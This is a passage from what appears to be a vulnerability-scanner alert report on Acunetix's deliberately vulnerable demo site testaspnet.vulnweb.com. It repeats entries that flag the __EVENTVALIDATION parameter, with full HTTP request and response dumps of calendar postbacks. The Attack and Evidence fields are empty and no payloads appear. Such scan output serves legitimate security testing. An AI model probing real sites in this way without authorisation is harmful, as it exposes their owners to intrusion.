ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1145 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,145 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8282&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAEWkIjtoIZGRkdeF3Xi9OepRSj0xasO3WCr%2BzirY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKvgfADAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACD8AkX6o12UayJQCrcfhhZcFEPg0%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:36 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAEWkIjtoIZGRkdeF3Xi9OepRSj0xasO3WCr+zirY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKvgfADAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACD8AkX6o12UayJQCrcfhhZcFEPg0=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:White" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8289&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAA9pGIk9oIZGRkQjNK0cL4EeyyudewLAHtUJa%2FH84%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKVkOHeCwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAriKUX6NipCOPOZidRWFIxlKnG4a
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:42 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAA9pGIk9oIZGRkQjNK0cL4EeyyudewLAHtUJa/H84=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKVkOHeCwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAriKUX6NipCOPOZidRWFIxlKnG4a" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:White" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is 